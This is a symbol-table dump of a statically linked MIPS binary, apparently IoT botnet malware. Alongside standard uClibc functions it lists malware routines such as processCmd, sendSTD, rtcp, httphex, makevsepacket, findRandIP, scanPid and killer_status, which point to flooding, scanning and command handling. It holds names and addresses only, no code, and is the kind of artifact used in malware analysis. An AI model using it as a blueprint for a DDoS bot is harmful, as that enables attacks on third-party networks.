_fpmaxtostr	.symtab	0x416030	2156	FUNC	<unknown>	HIDDEN	3
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ftext	.symtab	0x400160	0	NOTYPE	<unknown>	DEFAULT	3
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_gp	.symtab	0x468670	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_gp_disp	.symtab	0x0	0	OBJECT	<unknown>	DEFAULT	SHN_UNDEF
_h_errno	.symtab	0x466ea4	4	OBJECT	<unknown>	DEFAULT	15
_init	.symtab	0x4000cc	28	FUNC	<unknown>	DEFAULT	2
_load_inttype	.symtab	0x415e00	132	FUNC	<unknown>	HIDDEN	3
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_init	.symtab	0x40f280	248	FUNC	<unknown>	HIDDEN	3
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x40f68c	1684	FUNC	<unknown>	HIDDEN	3
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x40f380	100	FUNC	<unknown>	HIDDEN	3
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x40f3f0	548	FUNC	<unknown>	HIDDEN	3
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x40f620	108	FUNC	<unknown>	DEFAULT	3
_pthread_cleanup_pop_restore	.symtab	0x413c7c	36	FUNC	<unknown>	DEFAULT	3
_pthread_cleanup_push_defer	.symtab	0x413c70	12	FUNC	<unknown>	DEFAULT	3
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_sigintr	.symtab	0x467030	16	OBJECT	<unknown>	HIDDEN	15
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x415750	908	FUNC	<unknown>	HIDDEN	3
_stdio_init	.symtab	0x40e5b0	188	FUNC	<unknown>	HIDDEN	3
_stdio_openlist	.symtab	0x460414	4	OBJECT	<unknown>	DEFAULT	11
_stdio_openlist_add_lock	.symtab	0x4603c0	24	OBJECT	<unknown>	DEFAULT	11
_stdio_openlist_dec_use	.symtab	0x416a90	412	FUNC	<unknown>	HIDDEN	3
_stdio_openlist_del_count	.symtab	0x464c64	4	OBJECT	<unknown>	DEFAULT	15
_stdio_openlist_del_lock	.symtab	0x4603d8	24	OBJECT	<unknown>	DEFAULT	11
_stdio_openlist_use_count	.symtab	0x464c60	4	OBJECT	<unknown>	DEFAULT	15
_stdio_streams	.symtab	0x460418	240	OBJECT	<unknown>	DEFAULT	11
_stdio_term	.symtab	0x40e68c	304	FUNC	<unknown>	HIDDEN	3
_stdio_user_locking	.symtab	0x4603f0	4	OBJECT	<unknown>	DEFAULT	11
_stdlib_strto_l	.symtab	0x4131a0	600	FUNC	<unknown>	HIDDEN	3
_stdlib_strto_l.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_store_inttype	.symtab	0x415e90	68	FUNC	<unknown>	HIDDEN	3
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x41edf0	2934	OBJECT	<unknown>	HIDDEN	5
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x415ee0	332	FUNC	<unknown>	HIDDEN	3
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x40e9b4	2240	FUNC	<unknown>	HIDDEN	3
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x4127f0	408	FUNC	<unknown>	DEFAULT	3
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
access	.symtab	0x40de80	88	FUNC	<unknown>	DEFAULT	3
access.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
acnc	.symtab	0x40620c	372	FUNC	<unknown>	DEFAULT	3
add_entry	.symtab	0x40c5b0	200	FUNC	<unknown>	DEFAULT	3
atoi	.symtab	0x413160	28	FUNC	<unknown>	DEFAULT	3
atol	.symtab	0x413160	28	FUNC	<unknown>	DEFAULT	3
atol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bcopy	.symtab	0x4105b0	32	FUNC	<unknown>	DEFAULT	3
bcopy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
been_there_done_that	.symtab	0x466e60	4	OBJECT	<unknown>	DEFAULT	15
brk	.symtab	0x4180d0	112	FUNC	<unknown>	DEFAULT	3
brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bsd_signal	.symtab	0x410ef0	236	FUNC	<unknown>	DEFAULT	3
buf.5324	.symtab	0x466c90	440	OBJECT	<unknown>	DEFAULT	15
bzero	.symtab	0x410780	28	FUNC	<unknown>	DEFAULT	3
bzero.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
c	.symtab	0x4602ec	4	OBJECT	<unknown>	DEFAULT	11
calloc	.symtab	0x411be0	348	FUNC	<unknown>	DEFAULT	3
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0x400320	268	FUNC	<unknown>	DEFAULT	3
checksum_tcp_udp	.symtab	0x40042c	572	FUNC	<unknown>	DEFAULT	3
checksum_tcpudp	.symtab	0x400668	572	FUNC	<unknown>	DEFAULT	3
clock	.symtab	0x40e3f0	108	FUNC	<unknown>	DEFAULT	3
clock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
clock_getres	.symtab	0x4143f0	88	FUNC	<unknown>	DEFAULT	3
clock_getres.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x40e330	88	FUNC	<unknown>	DEFAULT	3
close.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closedir	.symtab	0x414730	308	FUNC	<unknown>	DEFAULT	3
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closenameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
completed.4632	.symtab	0x460c10	1	OBJECT	<unknown>	DEFAULT	15
connect	.symtab	0x410a10	92	FUNC	<unknown>	DEFAULT	3
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
connectTimeout	.symtab	0x403038	828	FUNC	<unknown>	DEFAULT	3
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
csum	.symtab	0x4036b8	460	FUNC	<unknown>	DEFAULT	3
data_start	.symtab	0x4602c0	0	OBJECT	<unknown>	DEFAULT	11
decoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
decodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dnslookup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dup2	.symtab	0x40dc60	88	FUNC	<unknown>	DEFAULT	3
dup2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeq.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
environ	.symtab	0x466e84	4	OBJECT	<unknown>	DEFAULT	15
errno	.symtab	0x466ea0	4	OBJECT	<unknown>	DEFAULT	15
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
estridx	.symtab	0x41ed60	126	OBJECT	<unknown>	DEFAULT	5
execl	.symtab	0x413b00	196	FUNC	<unknown>	DEFAULT	3
execl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x414350	88	FUNC	<unknown>	DEFAULT	3
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x413400	236	FUNC	<unknown>	DEFAULT	3
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x41fe08	72	OBJECT	<unknown>	DEFAULT	5
fclose	.symtab	0x415400	512	FUNC	<unknown>	DEFAULT	3
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x40e090	136	FUNC	<unknown>	DEFAULT	3
fd_to_DIR	.symtab	0x414870	276	FUNC	<unknown>	DEFAULT	3
fdgets	.symtab	0x402618	292	FUNC	<unknown>	DEFAULT	3
fdopen_pids	.symtab	0x464c4c	4	OBJECT	<unknown>	DEFAULT	15
fdopendir	.symtab	0x414a88	248	FUNC	<unknown>	DEFAULT	3
fdpclose	.symtab	0x40239c	636	FUNC	<unknown>	DEFAULT	3
fdpopen	.symtab	0x401f30	1132	FUNC	<unknown>	DEFAULT	3
fflush_unlocked	.symtab	0x416c2c	648	FUNC	<unknown>	DEFAULT	3
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc	.symtab	0x4168a0	264	FUNC	<unknown>	DEFAULT	3
fgetc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	DEFAULT	3
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x4169b0	212	FUNC	<unknown>	DEFAULT	3
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x417050	276	FUNC	<unknown>	DEFAULT	3
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
findRandIP	.symtab	0x40360c	172	FUNC	<unknown>	DEFAULT	3
fmt	.symtab	0x41fdf0	20	OBJECT	<unknown>	DEFAULT	5
fopen	.symtab	0x415600	28	FUNC	<unknown>	DEFAULT	3
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork	.symtab	0x40de00	88	FUNC	<unknown>	DEFAULT	3
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fputs_unlocked	.symtab	0x40fd20	124	FUNC	<unknown>	DEFAULT	3
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x40021c	0	FUNC	<unknown>	DEFAULT	3
free	.symtab	0x4124fc	660	FUNC	<unknown>	DEFAULT	3
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x418650	68	FUNC	<unknown>	DEFAULT	3
fseeko	.symtab	0x418650	68	FUNC	<unknown>	DEFAULT	3
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x4186a0	392	FUNC	<unknown>	DEFAULT	3
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x418140	144	FUNC	<unknown>	DEFAULT	3
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fwrite_unlocked	.symtab	0x40fda0	268	FUNC	<unknown>	DEFAULT	3
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getBuild	.symtab	0x409f4c	32	FUNC	<unknown>	DEFAULT	3
getHost	.symtab	0x402a7c	160	FUNC	<unknown>	DEFAULT	3
getOurIP	.symtab	0x409bcc	896	FUNC	<unknown>	DEFAULT	3
get_hosts_byname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getc	.symtab	0x4168a0	264	FUNC	<unknown>	DEFAULT	3
getc_unlocked	.symtab	0x416ec0	388	FUNC	<unknown>	DEFAULT	3
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x40dfe0	72	FUNC	<unknown>	DEFAULT	3
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x4144b0	16	FUNC	<unknown>	DEFAULT	3
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x40ddf0	16	FUNC	<unknown>	DEFAULT	3
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x414570	16	FUNC	<unknown>	DEFAULT	3
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname	.symtab	0x410960	28	FUNC	<unknown>	DEFAULT	3
gethostbyname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2	.symtab	0x410980	132	FUNC	<unknown>	DEFAULT	3
gethostbyname2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2_r	.symtab	0x417c90	948	FUNC	<unknown>	DEFAULT	3
gethostbyname2_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname_r	.symtab	0x41a8f0	940	FUNC	<unknown>	DEFAULT	3
gethostbyname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostname	.symtab	0x41ad00	204	FUNC	<unknown>	DEFAULT	3
gethostname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x4143b0	48	FUNC	<unknown>	DEFAULT	3
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x40dd50	16	FUNC	<unknown>	DEFAULT	3
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getppid	.symtab	0x40dcc0	16	FUNC	<unknown>	DEFAULT	3
getppid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x414450	88	FUNC	<unknown>	DEFAULT	3
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockname	.symtab	0x410a70	88	FUNC	<unknown>	DEFAULT	3
getsockname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x410ad0	124	FUNC	<unknown>	DEFAULT	3
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x4143e0	16	FUNC	<unknown>	DEFAULT	3
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
h_errno	.symtab	0x466ea4	4	OBJECT	<unknown>	DEFAULT	15
hacks	.symtab	0x4602d0	4	OBJECT	<unknown>	DEFAULT	11
hacks2	.symtab	0x4602d4	4	OBJECT	<unknown>	DEFAULT	11
hacks3	.symtab	0x4602d8	4	OBJECT	<unknown>	DEFAULT	11
hacks4	.symtab	0x4602dc	4	OBJECT	<unknown>	DEFAULT	11
hextable	.symtab	0x41c524	1024	OBJECT	<unknown>	DEFAULT	5
hlt	.symtab	0x40030c	0	NOTYPE	<unknown>	DEFAULT	3
hoste.5323	.symtab	0x466e48	20	OBJECT	<unknown>	DEFAULT	15
htonl	.symtab	0x4108a8	40	FUNC	<unknown>	DEFAULT	3
htons	.symtab	0x410890	24	FUNC	<unknown>	DEFAULT	3
httphex	.symtab	0x40653c	1664	FUNC	<unknown>	DEFAULT	3
i.4849	.symtab	0x4602f0	4	OBJECT	<unknown>	DEFAULT	11
index	.symtab	0x410460	248	FUNC	<unknown>	DEFAULT	3
inet_addr	.symtab	0x410910	72	FUNC	<unknown>	DEFAULT	3
inet_aton	.symtab	0x417b70	284	FUNC	<unknown>	DEFAULT	3
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_ntop	.symtab	0x419120	868	FUNC	<unknown>	DEFAULT	3
inet_ntop4	.symtab	0x418f58	456	FUNC	<unknown>	DEFAULT	3
inet_pton	.symtab	0x418c98	704	FUNC	<unknown>	DEFAULT	3
inet_pton4	.symtab	0x418bb0	232	FUNC	<unknown>	DEFAULT	3
initConnection	.symtab	0x409908	708	FUNC	<unknown>	DEFAULT	3
init_rand	.symtab	0x400ae4	300	FUNC	<unknown>	DEFAULT	3
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initstate	.symtab	0x412b0c	208	FUNC	<unknown>	DEFAULT	3
initstate_r	.symtab	0x413010	328	FUNC	<unknown>	DEFAULT	3
ioctl	.symtab	0x40e200	108	FUNC	<unknown>	DEFAULT	3
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
isatty	.symtab	0x4107a0	60	FUNC	<unknown>	DEFAULT	3
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
kill	.symtab	0x40e030	92	FUNC	<unknown>	DEFAULT	3
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_status	.symtab	0x460c40	4	OBJECT	<unknown>	DEFAULT	15
last_id.5381	.symtab	0x460650	2	OBJECT	<unknown>	DEFAULT	11
last_ns_num.5380	.symtab	0x466ec0	4	OBJECT	<unknown>	DEFAULT	15
libc/string/mips/memcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/mips/memset.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crt1.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crti.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crtn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/pipe.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/syscall_error.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/vfork.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
listFork	.symtab	0x403374	664	FUNC	<unknown>	DEFAULT	3
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lseek64	.symtab	0x41ae60	164	FUNC	<unknown>	DEFAULT	3
macAddress	.symtab	0x460c44	6	OBJECT	<unknown>	DEFAULT	15
main	.symtab	0x409f6c	3700	FUNC	<unknown>	DEFAULT	3
main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
makeIPPacket	.symtab	0x4039e0	296	FUNC	<unknown>	DEFAULT	3
makeRandomStr	.symtab	0x402bc0	268	FUNC	<unknown>	DEFAULT	3
makevsepacket	.symtab	0x405704	332	FUNC	<unknown>	DEFAULT	3
malloc	.symtab	0x4110fc	2776	FUNC	<unknown>	DEFAULT	3
malloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc_trim	.symtab	0x412790	84	FUNC	<unknown>	DEFAULT	3
memchr	.symtab	0x417170	260	FUNC	<unknown>	DEFAULT	3
memchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memcpy	.symtab	0x40ff40	308	FUNC	<unknown>	DEFAULT	3
memmove	.symtab	0x417280	824	FUNC	<unknown>	DEFAULT	3
memmove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mempcpy	.symtab	0x4179e0	76	FUNC	<unknown>	DEFAULT	3
mempcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memrchr	.symtab	0x4177e0	260	FUNC	<unknown>	DEFAULT	3
memrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memset	.symtab	0x40feb0	144	FUNC	<unknown>	DEFAULT	3
mmap	.symtab	0x414240	132	FUNC	<unknown>	DEFAULT	3
mmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mremap	.symtab	0x414640	124	FUNC	<unknown>	DEFAULT	3
mremap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
munmap	.symtab	0x414580	88	FUNC	<unknown>	DEFAULT	3
munmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mylock	.symtab	0x460540	24	OBJECT	<unknown>	DEFAULT	11
mylock	.symtab	0x460560	24	OBJECT	<unknown>	DEFAULT	11
nanosleep	.symtab	0x4145e0	92	FUNC	<unknown>	DEFAULT	3
nanosleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
next_start.1303	.symtab	0x466c80	4	OBJECT	<unknown>	DEFAULT	15
ngPid	.symtab	0x460be8	4	OBJECT	<unknown>	DEFAULT	14
nprocessors_onln	.symtab	0x413610	508	FUNC	<unknown>	DEFAULT	3
ntohl	.symtab	0x4108e8	40	FUNC	<unknown>	DEFAULT	3
ntohl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ntohs	.symtab	0x4108d0	24	FUNC	<unknown>	DEFAULT	3
ntop.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
numpids	.symtab	0x460c38	8	OBJECT	<unknown>	DEFAULT	15
object.4644	.symtab	0x460c14	24	OBJECT	<unknown>	DEFAULT	15
open	.symtab	0x40dcd0	124	FUNC	<unknown>	DEFAULT	3
open.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opendir	.symtab	0x414984	260	FUNC	<unknown>	DEFAULT	3
opendir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opennameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ourIP	.symtab	0x460be4	4	OBJECT	<unknown>	DEFAULT	14
p.4630	.symtab	0x4602b0	0	OBJECT	<unknown>	DEFAULT	11
parseHex	.symtab	0x40273c	176	FUNC	<unknown>	DEFAULT	3
parse_config.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
pids	.symtab	0x460bf0	4	OBJECT	<unknown>	DEFAULT	14
pipe	.symtab	0x40db70	64	FUNC	<unknown>	DEFAULT	3
poll	.symtab	0x41aca0	92	FUNC	<unknown>	DEFAULT	3
poll.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prctl	.symtab	0x40dd70	124	FUNC	<unknown>	DEFAULT	3
prctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prefix.4694	.symtab	0x41ecb0	12	OBJECT	<unknown>	DEFAULT	5
print	.symtab	0x401734	1460	FUNC	<unknown>	DEFAULT	3
printchar	.symtab	0x4011a4	184	FUNC	<unknown>	DEFAULT	3
printi	.symtab	0x401498	668	FUNC	<unknown>	DEFAULT	3
prints	.symtab	0x40125c	572	FUNC	<unknown>	DEFAULT	3
processCmd	.symtab	0x406bbc	11596	FUNC	<unknown>	DEFAULT	3
program_invocation_name	.symtab	0x460648	4	OBJECT	<unknown>	DEFAULT	11
program_invocation_short_name	.symtab	0x460644	4	OBJECT	<unknown>	DEFAULT	11
qual_chars.4702	.symtab	0x41ecd0	20	OBJECT	<unknown>	DEFAULT	5
raise	.symtab	0x418050	76	FUNC	<unknown>	DEFAULT	3
raise.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand	.symtab	0x412990	28	FUNC	<unknown>	DEFAULT	3
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand__str	.symtab	0x40affc	348	FUNC	<unknown>	DEFAULT	3
rand_alpha_str	.symtab	0x40b158	300	FUNC	<unknown>	DEFAULT	3
rand_alphastr	.symtab	0x400fd4	464	FUNC	<unknown>	DEFAULT	3
rand_cmwc	.symtab	0x400dfc	472	FUNC	<unknown>	DEFAULT	3
rand_init	.symtab	0x40ade0	248	FUNC	<unknown>	DEFAULT	3
rand_next	.symtab	0x40aed8	292	FUNC	<unknown>	DEFAULT	3
random	.symtab	0x4129b0	164	FUNC	<unknown>	DEFAULT	3
random.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
random_poly_info	.symtab	0x41f970	40	OBJECT	<unknown>	DEFAULT	5
random_r	.symtab	0x412dd4	172	FUNC	<unknown>	DEFAULT	3
random_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
randtbl	.symtab	0x460578	128	OBJECT	<unknown>	DEFAULT	11
rawmemchr	.symtab	0x417720	192	FUNC	<unknown>	DEFAULT	3
rawmemchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read	.symtab	0x40df80	88	FUNC	<unknown>	DEFAULT	3
read.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read_etc_hosts_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readdir64	.symtab	0x414b80	272	FUNC	<unknown>	DEFAULT	3
readdir64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realloc	.symtab	0x411d40	1156	FUNC	<unknown>	DEFAULT	3
realloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recv	.symtab	0x410b50	92	FUNC	<unknown>	DEFAULT	3
recv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recvLine	.symtab	0x402ccc	876	FUNC	<unknown>	DEFAULT	3
recvfrom	.symtab	0x410c34	32	FUNC	<unknown>	DEFAULT	3
recvfrom.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv_conf_mtime.5363	.symtab	0x466ee8	4	OBJECT	<unknown>	DEFAULT	15
resolv_domain_to_hostname	.symtab	0x40b290	360	FUNC	<unknown>	DEFAULT	3
resolv_entries_free	.symtab	0x40bf14	164	FUNC	<unknown>	DEFAULT	3
resolv_lookup	.symtab	0x40b53c	2520	FUNC	<unknown>	DEFAULT	3
resolv_skip_name	.symtab	0x40b3f8	324	FUNC	<unknown>	DEFAULT	3
rindex	.symtab	0x417940	160	FUNC	<unknown>	DEFAULT	3
rtcp	.symtab	0x404d68	1732	FUNC	<unknown>	DEFAULT	3
sbrk	.symtab	0x4144c0	164	FUNC	<unknown>	DEFAULT	3
sbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanPid	.symtab	0x460bec	4	OBJECT	<unknown>	DEFAULT	14
select	.symtab	0x40df5c	32	FUNC	<unknown>	DEFAULT	3
select.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
send	.symtab	0x410c60	92	FUNC	<unknown>	DEFAULT	3
send.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sendSTD	.symtab	0x40542c	728	FUNC	<unknown>	DEFAULT	3
sendto	.symtab	0x410d44	32	FUNC	<unknown>	DEFAULT	3
sendto.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsockopt	.symtab	0x410d70	124	FUNC	<unknown>	DEFAULT	3
setsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setstate	.symtab	0x412a54	184	FUNC	<unknown>	DEFAULT	3
setstate_r	.symtab	0x412c90	324	FUNC	<unknown>	DEFAULT	3
sigaction	.symtab	0x4142d0	28	FUNC	<unknown>	DEFAULT	3
sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigaddset	.symtab	0x410e50	104	FUNC	<unknown>	DEFAULT	3
sigaddset.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigempty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigemptyset	.symtab	0x410ec0	36	FUNC	<unknown>	DEFAULT	3
signal	.symtab	0x410ef0	236	FUNC	<unknown>	DEFAULT	3
signal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigprocmask	.symtab	0x40e2d0	96	FUNC	<unknown>	DEFAULT	3
sigprocmask.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigsetops.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
skip_and_NUL_space	.symtab	0x41a0c8	104	FUNC	<unknown>	DEFAULT	3
skip_nospace	.symtab	0x41a060	104	FUNC	<unknown>	DEFAULT	3
sleep	.symtab	0x4134f0	288	FUNC	<unknown>	DEFAULT	3
